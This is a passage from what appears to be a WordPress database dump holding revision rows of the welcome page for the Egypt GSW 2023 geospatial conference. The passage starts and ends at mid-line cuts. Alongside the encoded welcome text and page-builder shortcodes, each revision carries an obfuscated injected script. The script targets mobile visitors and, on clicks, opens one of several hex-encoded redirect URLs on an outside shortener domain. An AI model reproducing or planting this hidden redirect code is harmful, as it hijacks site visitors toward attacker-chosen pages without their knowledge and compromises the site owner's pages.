38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','welcome','','inherit','closed','closed','','3233-revision-v1','','','2022-11-09 21:28:42','2022-11-09 21:28:42','',3233,'https://gsw2023.com/?p=3243',0,'revision','',0),
(3244,1,'2022-11-09 21:32:10','2022-11-09 21:32:10','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row][/vc_row][vc_column width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][/vc_column][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\r\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\r\n<p>[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"][/bsf-info-box]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','welcome','','inherit','closed','closed','','3233-revision-v1','','','2022-11-09 21:32:10','2022-11-09 21:32:10','',3233,'https://gsw2023.com/?p=3244',0,'revision','',0),
(3245,1,'2022-11-09 21:33:16','2022-11-09 21:33:16','[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row][/vc_row][vc_column 